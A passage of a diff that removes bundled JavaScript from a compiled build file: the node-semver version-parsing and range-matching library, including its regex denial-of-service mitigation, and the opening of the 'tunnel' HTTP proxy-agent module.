RegExp(src[t.COMPARATORTRIM], 'g') -safeRe[t.COMPARATORTRIM] = new RegExp(makeSafeRe(src[t.COMPARATORTRIM]), 'g') -var comparatorTrimReplace = '$1$2$3' - -// Something like `1.2.3 - 1.2.4` -// Note that these all use the loose form, because they'll be -// checked against either the strict or loose comparator form -// later. -tok('HYPHENRANGE') -src[t.HYPHENRANGE] = '^\\s*(' + src[t.XRANGEPLAIN] + ')' + - '\\s+-\\s+' + - '(' + src[t.XRANGEPLAIN] + ')' + - '\\s*$' - -tok('HYPHENRANGELOOSE') -src[t.HYPHENRANGELOOSE] = '^\\s*(' + src[t.XRANGEPLAINLOOSE] + ')' + - '\\s+-\\s+' + - '(' + src[t.XRANGEPLAINLOOSE] + ')' + - '\\s*$' - -// Star ranges basically just allow anything at all. -tok('STAR') -src[t.STAR] = '(<|>)?=?\\s*\\*' - -// Compile to actual regexp objects. -// All are flag-free, unless they were created above with a flag. -for (var i = 0; i < R; i++) { - debug(i, src[i]) - if (!re[i]) { - re[i] = new RegExp(src[i]) - - // Replace all greedy whitespace to prevent regex dos issues. These regex are - // used internally via the safeRe object since all inputs in this library get - // normalized first to trim and collapse all extra whitespace. The original - // regexes are exported for userland consumption and lower level usage. A - // future breaking change could export the safer regex only with a note that - // all input should have extra whitespace removed. - safeRe[i] = new RegExp(makeSafeRe(src[i])) - } -} - -exports.parse = parse -function parse (version, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - if (version instanceof SemVer) { - return version - } - - if (typeof version !== 'string') { - return null - } - - if (version.length > MAX_LENGTH) { - return null - } - - var r = options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL] - if (!r.test(version)) { - return null - } - - try { - return new SemVer(version, options) - } catch (er) { - return null - } -} - -exports.valid = valid -function valid (version, options) { - var v = parse(version, options) - return v ? v.version : null -} - -exports.clean = clean -function clean (version, options) { - var s = parse(version.trim().replace(/^[=v]+/, ''), options) - return s ? s.version : null -} - -exports.SemVer = SemVer - -function SemVer (version, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - if (version instanceof SemVer) { - if (version.loose === options.loose) { - return version - } else { - version = version.version - } - } else if (typeof version !== 'string') { - throw new TypeError('Invalid Version: ' + version) - } - - if (version.length > MAX_LENGTH) { - throw new TypeError('version is longer than ' + MAX_LENGTH + ' characters') - } - - if (!(this instanceof SemVer)) { - return new SemVer(version, options) - } - - debug('SemVer', version, options) - this.options = options - this.loose = !!options.loose - - var m = version.trim().match(options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL]) - - if (!m) { - throw new TypeError('Invalid Version: ' + version) - } - - this.raw = version - - // these are actually numbers - this.major = +m[1] - this.minor = +m[2] - this.patch = +m[3] - - if (this.major > MAX_SAFE_INTEGER || this.major < 0) { - throw new TypeError('Invalid major version') - } - - if (this.minor > MAX_SAFE_INTEGER || this.minor < 0) { - throw new TypeError('Invalid minor version') - } - - if (this.patch > MAX_SAFE_INTEGER || this.patch < 0) { - throw new TypeError('Invalid patch version') - } - - // numberify any prerelease numeric ids - if (!m[4]) { - this.prerelease = [] - } else { - this.prerelease = m[4].split('.').map(function (id) { - if (/^[0-9]+$/.test(id)) { - var num = +id - if (num >= 0 && num < MAX_SAFE_INTEGER) { - return num - } - } - return id - }) - } - - this.build = m[5] ? m[5].split('.') : [] - this.format() -} - -SemVer.prototype.format = function () { - this.version = this.major + '.' + this.minor + '.' + this.patch - if (this.prerelease.length) { - this.version += '-' + this.prerelease.join('.') - } - return this.version -} - -SemVer.prototype.toString = function () { - return this.version -} - -SemVer.prototype.compare = function (other) { - debug('SemVer.compare', this.version, this.options, other) - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - return this.compareMain(other) || this.comparePre(other) -} - -SemVer.prototype.compareMain = function (other) { - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - return compareIdentifiers(this.major, other.major) || - compareIdentifiers(this.minor, other.minor) || - compareIdentifiers(this.patch, other.patch) -} - -SemVer.prototype.comparePre = function (other) { - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - // NOT having a prerelease is > having one - if (this.prerelease.length && !other.prerelease.length) { - return -1 - } else if (!this.prerelease.length && other.prerelease.length) { - return 1 - } else if (!this.prerelease.length && !other.prerelease.length) { - return 0 - } - - var i = 0 - do { - var a = this.prerelease[i] - var b = other.prerelease[i] - debug('prerelease compare', i, a, b) - if (a === undefined && b === undefined) { - return 0 - } else if (b === undefined) { - return 1 - } else if (a === undefined) { - return -1 - } else if (a === b) { - continue - } else { - return compareIdentifiers(a, b) - } - } while (++i) -} - -SemVer.prototype.compareBuild = function (other) { - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - var i = 0 - do { - var a = this.build[i] - var b = other.build[i] - debug('prerelease compare', i, a, b) - if (a === undefined && b === undefined) { - return 0 - } else if (b === undefined) { - return 1 - } else if (a === undefined) { - return -1 - } else if (a === b) { - continue - } else { - return compareIdentifiers(a, b) - } - } while (++i) -} - -// preminor will bump the version up to the next minor release, and immediately -// down to pre-release. premajor and prepatch work the same way. -SemVer.prototype.inc = function (release, identifier) { - switch (release) { - case 'premajor': - this.prerelease.length = 0 - this.patch = 0 - this.minor = 0 - this.major++ - this.inc('pre', identifier) - break - case 'preminor': - this.prerelease.length = 0 - this.patch = 0 - this.minor++ - this.inc('pre', identifier) - break - case 'prepatch': - // If this is already a prerelease, it will bump to the next version - // drop any prereleases that might already exist, since they are not - // relevant at this point. - this.prerelease.length = 0 - this.inc('patch', identifier) - this.inc('pre', identifier) - break - // If the input is a non-prerelease version, this acts the same as - // prepatch. - case 'prerelease': - if (this.prerelease.length === 0) { - this.inc('patch', identifier) - } - this.inc('pre', identifier) - break - - case 'major': - // If this is a pre-major version, bump up to the same major version. - // Otherwise increment major. - // 1.0.0-5 bumps to 1.0.0 - // 1.1.0 bumps to 2.0.0 - if (this.minor !== 0 || - this.patch !== 0 || - this.prerelease.length === 0) { - this.major++ - } - this.minor = 0 - this.patch = 0 - this.prerelease = [] - break - case 'minor': - // If this is a pre-minor version, bump up to the same minor version. - // Otherwise increment minor. - // 1.2.0-5 bumps to 1.2.0 - // 1.2.1 bumps to 1.3.0 - if (this.patch !== 0 || this.prerelease.length === 0) { - this.minor++ - } - this.patch = 0 - this.prerelease = [] - break - case 'patch': - // If this is not a pre-release version, it will increment the patch. - // If it is a pre-release it will bump up to the same patch version. - // 1.2.0-5 patches to 1.2.0 - // 1.2.0 patches to 1.2.1 - if (this.prerelease.length === 0) { - this.patch++ - } - this.prerelease = [] - break - // This probably shouldn't be used publicly. - // 1.0.0 "pre" would become 1.0.0-0 which is the wrong direction. - case 'pre': - if (this.prerelease.length === 0) { - this.prerelease = [0] - } else { - var i = this.prerelease.length - while (--i >= 0) { - if (typeof this.prerelease[i] === 'number') { - this.prerelease[i]++ - i = -2 - } - } - if (i === -1) { - // didn't increment anything - this.prerelease.push(0) - } - } - if (identifier) { - // 1.2.0-beta.1 bumps to 1.2.0-beta.2, - // 1.2.0-beta.fooblz or 1.2.0-beta bumps to 1.2.0-beta.0 - if (this.prerelease[0] === identifier) { - if (isNaN(this.prerelease[1])) { - this.prerelease = [identifier, 0] - } - } else { - this.prerelease = [identifier, 0] - } - } - break - - default: - throw new Error('invalid increment argument: ' + release) - } - this.format() - this.raw = this.version - return this -} - -exports.inc = inc -function inc (version, release, loose, identifier) { - if (typeof (loose) === 'string') { - identifier = loose - loose = undefined - } - - try { - return new SemVer(version, loose).inc(release, identifier).version - } catch (er) { - return null - } -} - -exports.diff = diff -function diff (version1, version2) { - if (eq(version1, version2)) { - return null - } else { - var v1 = parse(version1) - var v2 = parse(version2) - var prefix = '' - if (v1.prerelease.length || v2.prerelease.length) { - prefix = 'pre' - var defaultResult = 'prerelease' - } - for (var key in v1) { - if (key === 'major' || key === 'minor' || key === 'patch') { - if (v1[key] !== v2[key]) { - return prefix + key - } - } - } - return defaultResult // may be undefined - } -} - -exports.compareIdentifiers = compareIdentifiers - -var numeric = /^[0-9]+$/ -function compareIdentifiers (a, b) { - var anum = numeric.test(a) - var bnum = numeric.test(b) - - if (anum && bnum) { - a = +a - b = +b - } - - return a === b ? 0 - : (anum && !bnum) ? -1 - : (bnum && !anum) ? 1 - : a < b ? -1 - : 1 -} - -exports.rcompareIdentifiers = rcompareIdentifiers -function rcompareIdentifiers (a, b) { - return compareIdentifiers(b, a) -} - -exports.major = major -function major (a, loose) { - return new SemVer(a, loose).major -} - -exports.minor = minor -function minor (a, loose) { - return new SemVer(a, loose).minor -} - -exports.patch = patch -function patch (a, loose) { - return new SemVer(a, loose).patch -} - -exports.compare = compare -function compare (a, b, loose) { - return new SemVer(a, loose).compare(new SemVer(b, loose)) -} - -exports.compareLoose = compareLoose -function compareLoose (a, b) { - return compare(a, b, true) -} - -exports.compareBuild = compareBuild -function compareBuild (a, b, loose) { - var versionA = new SemVer(a, loose) - var versionB = new SemVer(b, loose) - return versionA.compare(versionB) || versionA.compareBuild(versionB) -} - -exports.rcompare = rcompare -function rcompare (a, b, loose) { - return compare(b, a, loose) -} - -exports.sort = sort -function sort (list, loose) { - return list.sort(function (a, b) { - return exports.compareBuild(a, b, loose) - }) -} - -exports.rsort = rsort -function rsort (list, loose) { - return list.sort(function (a, b) { - return exports.compareBuild(b, a, loose) - }) -} - -exports.gt = gt -function gt (a, b, loose) { - return compare(a, b, loose) > 0 -} - -exports.lt = lt -function lt (a, b, loose) { - return compare(a, b, loose) < 0 -} - -exports.eq = eq -function eq (a, b, loose) { - return compare(a, b, loose) === 0 -} - -exports.neq = neq -function neq (a, b, loose) { - return compare(a, b, loose) !== 0 -} - -exports.gte = gte -function gte (a, b, loose) { - return compare(a, b, loose) >= 0 -} - -exports.lte = lte -function lte (a, b, loose) { - return compare(a, b, loose) <= 0 -} - -exports.cmp = cmp -function cmp (a, op, b, loose) { - switch (op) { - case '===': - if (typeof a === 'object') - a = a.version - if (typeof b === 'object') - b = b.version - return a === b - - case '!==': - if (typeof a === 'object') - a = a.version - if (typeof b === 'object') - b = b.version - return a !== b - - case '': - case '=': - case '==': - return eq(a, b, loose) - - case '!=': - return neq(a, b, loose) - - case '>': - return gt(a, b, loose) - - case '>=': - return gte(a, b, loose) - - case '<': - return lt(a, b, loose) - - case '<=': - return lte(a, b, loose) - - default: - throw new TypeError('Invalid operator: ' + op) - } -} - -exports.Comparator = Comparator -function Comparator (comp, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - if (comp instanceof Comparator) { - if (comp.loose === !!options.loose) { - return comp - } else { - comp = comp.value - } - } - - if (!(this instanceof Comparator)) { - return new Comparator(comp, options) - } - - comp = comp.trim().split(/\s+/).join(' ') - debug('comparator', comp, options) - this.options = options - this.loose = !!options.loose - this.parse(comp) - - if (this.semver === ANY) { - this.value = '' - } else { - this.value = this.operator + this.semver.version - } - - debug('comp', this) -} - -var ANY = {} -Comparator.prototype.parse = function (comp) { - var r = this.options.loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] - var m = comp.match(r) - - if (!m) { - throw new TypeError('Invalid comparator: ' + comp) - } - - this.operator = m[1] !== undefined ? m[1] : '' - if (this.operator === '=') { - this.operator = '' - } - - // if it literally is just '>' or '' then allow anything. - if (!m[2]) { - this.semver = ANY - } else { - this.semver = new SemVer(m[2], this.options.loose) - } -} - -Comparator.prototype.toString = function () { - return this.value -} - -Comparator.prototype.test = function (version) { - debug('Comparator.test', version, this.options.loose) - - if (this.semver === ANY || version === ANY) { - return true - } - - if (typeof version === 'string') { - try { - version = new SemVer(version, this.options) - } catch (er) { - return false - } - } - - return cmp(version, this.operator, this.semver, this.options) -} - -Comparator.prototype.intersects = function (comp, options) { - if (!(comp instanceof Comparator)) { - throw new TypeError('a Comparator is required') - } - - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - var rangeTmp - - if (this.operator === '') { - if (this.value === '') { - return true - } - rangeTmp = new Range(comp.value, options) - return satisfies(this.value, rangeTmp, options) - } else if (comp.operator === '') { - if (comp.value === '') { - return true - } - rangeTmp = new Range(this.value, options) - return satisfies(comp.semver, rangeTmp, options) - } - - var sameDirectionIncreasing = - (this.operator === '>=' || this.operator === '>') && - (comp.operator === '>=' || comp.operator === '>') - var sameDirectionDecreasing = - (this.operator === '<=' || this.operator === '<') && - (comp.operator === '<=' || comp.operator === '<') - var sameSemVer = this.semver.version === comp.semver.version - var differentDirectionsInclusive = - (this.operator === '>=' || this.operator === '<=') && - (comp.operator === '>=' || comp.operator === '<=') - var oppositeDirectionsLessThan = - cmp(this.semver, '<', comp.semver, options) && - ((this.operator === '>=' || this.operator === '>') && - (comp.operator === '<=' || comp.operator === '<')) - var oppositeDirectionsGreaterThan = - cmp(this.semver, '>', comp.semver, options) && - ((this.operator === '<=' || this.operator === '<') && - (comp.operator === '>=' || comp.operator === '>')) - - return sameDirectionIncreasing || sameDirectionDecreasing || - (sameSemVer && differentDirectionsInclusive) || - oppositeDirectionsLessThan || oppositeDirectionsGreaterThan -} - -exports.Range = Range -function Range (range, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - if (range instanceof Range) { - if (range.loose === !!options.loose && - range.includePrerelease === !!options.includePrerelease) { - return range - } else { - return new Range(range.raw, options) - } - } - - if (range instanceof Comparator) { - return new Range(range.value, options) - } - - if (!(this instanceof Range)) { - return new Range(range, options) - } - - this.options = options - this.loose = !!options.loose - this.includePrerelease = !!options.includePrerelease - - // First reduce all whitespace as much as possible so we do not have to rely - // on potentially slow regexes like \s*. This is then stored and used for - // future error messages as well. - this.raw = range - .trim() - .split(/\s+/) - .join(' ') - - // First, split based on boolean or || - this.set = this.raw.split('||').map(function (range) { - return this.parseRange(range.trim()) - }, this).filter(function (c) { - // throw out any that are not relevant for whatever reason - return c.length - }) - - if (!this.set.length) { - throw new TypeError('Invalid SemVer Range: ' + this.raw) - } - - this.format() -} - -Range.prototype.format = function () { - this.range = this.set.map(function (comps) { - return comps.join(' ').trim() - }).join('||').trim() - return this.range -} - -Range.prototype.toString = function () { - return this.range -} - -Range.prototype.parseRange = function (range) { - var loose = this.options.loose - // `1.2.3 - 1.2.4` => `>=1.2.3 <=1.2.4` - var hr = loose ? safeRe[t.HYPHENRANGELOOSE] : safeRe[t.HYPHENRANGE] - range = range.replace(hr, hyphenReplace) - debug('hyphen replace', range) - // `> 1.2.3 < 1.2.5` => `>1.2.3 <1.2.5` - range = range.replace(safeRe[t.COMPARATORTRIM], comparatorTrimReplace) - debug('comparator trim', range, safeRe[t.COMPARATORTRIM]) - - // `~ 1.2.3` => `~1.2.3` - range = range.replace(safeRe[t.TILDETRIM], tildeTrimReplace) - - // `^ 1.2.3` => `^1.2.3` - range = range.replace(safeRe[t.CARETTRIM], caretTrimReplace) - - // normalize spaces - range = range.split(/\s+/).join(' ') - - // At this point, the range is completely trimmed and - // ready to be split into comparators. - - var compRe = loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] - var set = range.split(' ').map(function (comp) { - return parseComparator(comp, this.options) - }, this).join(' ').split(/\s+/) - if (this.options.loose) { - // in loose mode, throw out any that are not valid comparators - set = set.filter(function (comp) { - return !!comp.match(compRe) - }) - } - set = set.map(function (comp) { - return new Comparator(comp, this.options) - }, this) - - return set -} - -Range.prototype.intersects = function (range, options) { - if (!(range instanceof Range)) { - throw new TypeError('a Range is required') - } - - return this.set.some(function (thisComparators) { - return ( - isSatisfiable(thisComparators, options) && - range.set.some(function (rangeComparators) { - return ( - isSatisfiable(rangeComparators, options) && - thisComparators.every(function (thisComparator) { - return rangeComparators.every(function (rangeComparator) { - return thisComparator.intersects(rangeComparator, options) - }) - }) - ) - }) - ) - }) -} - -// take a set of comparators and determine whether there -// exists a version which can satisfy it -function isSatisfiable (comparators, options) { - var result = true - var remainingComparators = comparators.slice() - var testComparator = remainingComparators.pop() - - while (result && remainingComparators.length) { - result = remainingComparators.every(function (otherComparator) { - return testComparator.intersects(otherComparator, options) - }) - - testComparator = remainingComparators.pop() - } - - return result -} - -// Mostly just for testing and legacy API reasons -exports.toComparators = toComparators -function toComparators (range, options) { - return new Range(range, options).set.map(function (comp) { - return comp.map(function (c) { - return c.value - }).join(' ').trim().split(' ') - }) -} - -// comprised of xranges, tildes, stars, and gtlt's at this point. -// already replaced the hyphen ranges -// turn into a set of JUST comparators. -function parseComparator (comp, options) { - debug('comp', comp, options) - comp = replaceCarets(comp, options) - debug('caret', comp) - comp = replaceTildes(comp, options) - debug('tildes', comp) - comp = replaceXRanges(comp, options) - debug('xrange', comp) - comp = replaceStars(comp, options) - debug('stars', comp) - return comp -} - -function isX (id) { - return !id || id.toLowerCase() === 'x' || id === '*' -} - -// ~, ~> --> * (any, kinda silly) -// ~2, ~2.x, ~2.x.x, ~>2, ~>2.x ~>2.x.x --> >=2.0.0 <3.0.0 -// ~2.0, ~2.0.x, ~>2.0, ~>2.0.x --> >=2.0.0 <2.1.0 -// ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0 <1.3.0 -// ~1.2.3, ~>1.2.3 --> >=1.2.3 <1.3.0 -// ~1.2.0, ~>1.2.0 --> >=1.2.0 <1.3.0 -function replaceTildes (comp, options) { - return comp.trim().split(/\s+/).map(function (comp) { - return replaceTilde(comp, options) - }).join(' ') -} - -function replaceTilde (comp, options) { - var r = options.loose ? safeRe[t.TILDELOOSE] : safeRe[t.TILDE] - return comp.replace(r, function (_, M, m, p, pr) { - debug('tilde', comp, _, M, m, p, pr) - var ret - - if (isX(M)) { - ret = '' - } else if (isX(m)) { - ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' - } else if (isX(p)) { - // ~1.2 == >=1.2.0 <1.3.0 - ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0' - } else if (pr) { - debug('replaceTilde pr', pr) - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + M + '.' + (+m + 1) + '.0' - } else { - // ~1.2.3 == >=1.2.3 <1.3.0 - ret = '>=' + M + '.' + m + '.' + p + - ' <' + M + '.' + (+m + 1) + '.0' - } - - debug('tilde return', ret) - return ret - }) -} - -// ^ --> * (any, kinda silly) -// ^2, ^2.x, ^2.x.x --> >=2.0.0 <3.0.0 -// ^2.0, ^2.0.x --> >=2.0.0 <3.0.0 -// ^1.2, ^1.2.x --> >=1.2.0 <2.0.0 -// ^1.2.3 --> >=1.2.3 <2.0.0 -// ^1.2.0 --> >=1.2.0 <2.0.0 -function replaceCarets (comp, options) { - return comp.trim().split(/\s+/).map(function (comp) { - return replaceCaret(comp, options) - }).join(' ') -} - -function replaceCaret (comp, options) { - debug('caret', comp, options) - var r = options.loose ? safeRe[t.CARETLOOSE] : safeRe[t.CARET] - return comp.replace(r, function (_, M, m, p, pr) { - debug('caret', comp, _, M, m, p, pr) - var ret - - if (isX(M)) { - ret = '' - } else if (isX(m)) { - ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' - } else if (isX(p)) { - if (M === '0') { - ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0' - } else { - ret = '>=' + M + '.' + m + '.0 <' + (+M + 1) + '.0.0' - } - } else if (pr) { - debug('replaceCaret pr', pr) - if (M === '0') { - if (m === '0') { - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + M + '.' + m + '.' + (+p + 1) - } else { - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + M + '.' + (+m + 1) + '.0' - } - } else { - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + (+M + 1) + '.0.0' - } - } else { - debug('no pr') - if (M === '0') { - if (m === '0') { - ret = '>=' + M + '.' + m + '.' + p + - ' <' + M + '.' + m + '.' + (+p + 1) - } else { - ret = '>=' + M + '.' + m + '.' + p + - ' <' + M + '.' + (+m + 1) + '.0' - } - } else { - ret = '>=' + M + '.' + m + '.' + p + - ' <' + (+M + 1) + '.0.0' - } - } - - debug('caret return', ret) - return ret - }) -} - -function replaceXRanges (comp, options) { - debug('replaceXRanges', comp, options) - return comp.split(/\s+/).map(function (comp) { - return replaceXRange(comp, options) - }).join(' ') -} - -function replaceXRange (comp, options) { - comp = comp.trim() - var r = options.loose ? safeRe[t.XRANGELOOSE] : safeRe[t.XRANGE] - return comp.replace(r, function (ret, gtlt, M, m, p, pr) { - debug('xRange', comp, ret, gtlt, M, m, p, pr) - var xM = isX(M) - var xm = xM || isX(m) - var xp = xm || isX(p) - var anyX = xp - - if (gtlt === '=' && anyX) { - gtlt = '' - } - - // if we're including prereleases in the match, then we need - // to fix this to -0, the lowest possible prerelease value - pr = options.includePrerelease ? '-0' : '' - - if (xM) { - if (gtlt === '>' || gtlt === '<') { - // nothing is allowed - ret = '<0.0.0-0' - } else { - // nothing is forbidden - ret = '*' - } - } else if (gtlt && anyX) { - // we know patch is an x, because we have any x at all. - // replace X with 0 - if (xm) { - m = 0 - } - p = 0 - - if (gtlt === '>') { - // >1 => >=2.0.0 - // >1.2 => >=1.3.0 - // >1.2.3 => >= 1.2.4 - gtlt = '>=' - if (xm) { - M = +M + 1 - m = 0 - p = 0 - } else { - m = +m + 1 - p = 0 - } - } else if (gtlt === '<=') { - // <=0.7.x is actually <0.8.0, since any 0.7.x should - // pass. Similarly, <=7.x is actually <8.0.0, etc. - gtlt = '<' - if (xm) { - M = +M + 1 - } else { - m = +m + 1 - } - } - - ret = gtlt + M + '.' + m + '.' + p + pr - } else if (xm) { - ret = '>=' + M + '.0.0' + pr + ' <' + (+M + 1) + '.0.0' + pr - } else if (xp) { - ret = '>=' + M + '.' + m + '.0' + pr + - ' <' + M + '.' + (+m + 1) + '.0' + pr - } - - debug('xRange return', ret) - - return ret - }) -} - -// Because * is AND-ed with everything else in the comparator, -// and '' means "any version", just remove the *s entirely. -function replaceStars (comp, options) { - debug('replaceStars', comp, options) - // Looseness is ignored here. star is always as loose as it gets! - return comp.trim().replace(safeRe[t.STAR], '') -} - -// This function is passed to string.replace(re[t.HYPHENRANGE]) -// M, m, patch, prerelease, build -// 1.2 - 3.4.5 => >=1.2.0 <=3.4.5 -// 1.2.3 - 3.4 => >=1.2.0 <3.5.0 Any 3.4.x will do -// 1.2 - 3.4 => >=1.2.0 <3.5.0 -function hyphenReplace ($0, - from, fM, fm, fp, fpr, fb, - to, tM, tm, tp, tpr, tb) { - if (isX(fM)) { - from = '' - } else if (isX(fm)) { - from = '>=' + fM + '.0.0' - } else if (isX(fp)) { - from = '>=' + fM + '.' + fm + '.0' - } else { - from = '>=' + from - } - - if (isX(tM)) { - to = '' - } else if (isX(tm)) { - to = '<' + (+tM + 1) + '.0.0' - } else if (isX(tp)) { - to = '<' + tM + '.' + (+tm + 1) + '.0' - } else if (tpr) { - to = '<=' + tM + '.' + tm + '.' + tp + '-' + tpr - } else { - to = '<=' + to - } - - return (from + ' ' + to).trim() -} - -// if ANY of the sets match ALL of its comparators, then pass -Range.prototype.test = function (version) { - if (!version) { - return false - } - - if (typeof version === 'string') { - try { - version = new SemVer(version, this.options) - } catch (er) { - return false - } - } - - for (var i = 0; i < this.set.length; i++) { - if (testSet(this.set[i], version, this.options)) { - return true - } - } - return false -} - -function testSet (set, version, options) { - for (var i = 0; i < set.length; i++) { - if (!set[i].test(version)) { - return false - } - } - - if (version.prerelease.length && !options.includePrerelease) { - // Find the set of versions that are allowed to have prereleases - // For example, ^1.2.3-pr.1 desugars to >=1.2.3-pr.1 <2.0.0 - // That should allow `1.2.3-pr.2` to pass. - // However, `1.2.4-alpha.notready` should NOT be allowed, - // even though it's within the range set by the comparators. - for (i = 0; i < set.length; i++) { - debug(set[i].semver) - if (set[i].semver === ANY) { - continue - } - - if (set[i].semver.prerelease.length > 0) { - var allowed = set[i].semver - if (allowed.major === version.major && - allowed.minor === version.minor && - allowed.patch === version.patch) { - return true - } - } - } - - // Version has a -pre, but it's not one of the ones we like. - return false - } - - return true -} - -exports.satisfies = satisfies -function satisfies (version, range, options) { - try { - range = new Range(range, options) - } catch (er) { - return false - } - return range.test(version) -} - -exports.maxSatisfying = maxSatisfying -function maxSatisfying (versions, range, options) { - var max = null - var maxSV = null - try { - var rangeObj = new Range(range, options) - } catch (er) { - return null - } - versions.forEach(function (v) { - if (rangeObj.test(v)) { - // satisfies(v, range, options) - if (!max || maxSV.compare(v) === -1) { - // compare(max, v, true) - max = v - maxSV = new SemVer(max, options) - } - } - }) - return max -} - -exports.minSatisfying = minSatisfying -function minSatisfying (versions, range, options) { - var min = null - var minSV = null - try { - var rangeObj = new Range(range, options) - } catch (er) { - return null - } - versions.forEach(function (v) { - if (rangeObj.test(v)) { - // satisfies(v, range, options) - if (!min || minSV.compare(v) === 1) { - // compare(min, v, true) - min = v - minSV = new SemVer(min, options) - } - } - }) - return min -} - -exports.minVersion = minVersion -function minVersion (range, loose) { - range = new Range(range, loose) - - var minver = new SemVer('0.0.0') - if (range.test(minver)) { - return minver - } - - minver = new SemVer('0.0.0-0') - if (range.test(minver)) { - return minver - } - - minver = null - for (var i = 0; i < range.set.length; ++i) { - var comparators = range.set[i] - - comparators.forEach(function (comparator) { - // Clone to avoid manipulating the comparator's semver object. - var compver = new SemVer(comparator.semver.version) - switch (comparator.operator) { - case '>': - if (compver.prerelease.length === 0) { - compver.patch++ - } else { - compver.prerelease.push(0) - } - compver.raw = compver.format() - /* fallthrough */ - case '': - case '>=': - if (!minver || gt(minver, compver)) { - minver = compver - } - break - case '<': - case '<=': - /* Ignore maximum versions */ - break - /* istanbul ignore next */ - default: - throw new Error('Unexpected operation: ' + comparator.operator) - } - }) - } - - if (minver && range.test(minver)) { - return minver - } - - return null -} - -exports.validRange = validRange -function validRange (range, options) { - try { - // Return '*' instead of '' so that truthiness works. - // This will throw if it's invalid anyway - return new Range(range, options).range || '*' - } catch (er) { - return null - } -} - -// Determine if version is less than all the versions possible in the range -exports.ltr = ltr -function ltr (version, range, options) { - return outside(version, range, '<', options) -} - -// Determine if version is greater than all the versions possible in the range. -exports.gtr = gtr -function gtr (version, range, options) { - return outside(version, range, '>', options) -} - -exports.outside = outside -function outside (version, range, hilo, options) { - version = new SemVer(version, options) - range = new Range(range, options) - - var gtfn, ltefn, ltfn, comp, ecomp - switch (hilo) { - case '>': - gtfn = gt - ltefn = lte - ltfn = lt - comp = '>' - ecomp = '>=' - break - case '<': - gtfn = lt - ltefn = gte - ltfn = gt - comp = '<' - ecomp = '<=' - break - default: - throw new TypeError('Must provide a hilo val of "<" or ">"') - } - - // If it satisifes the range it is not outside - if (satisfies(version, range, options)) { - return false - } - - // From now on, variable terms are as if we're in "gtr" mode. - // but note that everything is flipped for the "ltr" function. - - for (var i = 0; i < range.set.length; ++i) { - var comparators = range.set[i] - - var high = null - var low = null - - comparators.forEach(function (comparator) { - if (comparator.semver === ANY) { - comparator = new Comparator('>=0.0.0') - } - high = high || comparator - low = low || comparator - if (gtfn(comparator.semver, high.semver, options)) { - high = comparator - } else if (ltfn(comparator.semver, low.semver, options)) { - low = comparator - } - }) - - // If the edge version comparator has a operator then our version - // isn't outside it - if (high.operator === comp || high.operator === ecomp) { - return false - } - - // If the lowest version comparator has an operator and our version - // is less than it then it isn't higher than the range - if ((!low.operator || low.operator === comp) && - ltefn(version, low.semver)) { - return false - } else if (low.operator === ecomp && ltfn(version, low.semver)) { - return false - } - } - return true -} - -exports.prerelease = prerelease -function prerelease (version, options) { - var parsed = parse(version, options) - return (parsed && parsed.prerelease.length) ? parsed.prerelease : null -} - -exports.intersects = intersects -function intersects (r1, r2, options) { - r1 = new Range(r1, options) - r2 = new Range(r2, options) - return r1.intersects(r2) -} - -exports.coerce = coerce -function coerce (version, options) { - if (version instanceof SemVer) { - return version - } - - if (typeof version === 'number') { - version = String(version) - } - - if (typeof version !== 'string') { - return null - } - - options = options || {} - - var match = null - if (!options.rtl) { - match = version.match(safeRe[t.COERCE]) - } else { - // Find the right-most coercible string that does not share - // a terminus with a more left-ward coercible string. - // Eg, '1.2.3.4' wants to coerce '2.3.4', not '3.4' or '4' - // - // Walk through the string checking with a /g regexp - // Manually set the index so as to pick up overlapping matches. - // Stop when we get a match that ends at the string end, since no - // coercible string can be more right-ward without the same terminus. - var next - while ((next = safeRe[t.COERCERTL].exec(version)) && - (!match || match.index + match[0].length !== version.length) - ) { - if (!match || - next.index + next[0].length !== match.index + match[0].length) { - match = next - } - safeRe[t.COERCERTL].lastIndex = next.index + next[1].length + next[2].length - } - // leave it in a clean state - safeRe[t.COERCERTL].lastIndex = -1 - } - - if (match === null) { - return null - } - - return parse(match[2] + - '.' + (match[3] || '0') + - '.' + (match[4] || '0'), options) -} - - -/***/ }), - -/***/ 4294: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -module.exports = __nccwpck_require__(4219); - - -/***/ }), - -/***/ 4219: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -var net = __nccwpck_require__(1808); -var tls = __nccwpck_require__(4404); -var http = __nccwpck_require__(3685); -var https = __nccwpck_require__(5687); -var events = __nccwpck_require__(2361); -var assert = __nccwpck_require__(9491); -var util = __nccwpck_require__(3837); - - -exports.httpOverHttp = httpOverHttp; -exports.httpsOverHttp = httpsOverHttp; -exports.httpOverHttps = httpOverHttps; -exports.httpsOverHttps = httpsOverHttps; - - -function httpOverHttp(options) { - var agent = new TunnelingAgent(options); - agent.request = http.request; - return agent; -} - -function httpsOverHttp(options) { - var agent = new TunnelingAgent(options); - agent.request = http.request; - agent.createSocket = createSecureSocket; - agent.defaultPort = 443; - return agent; -} - -function httpOverHttps(options) 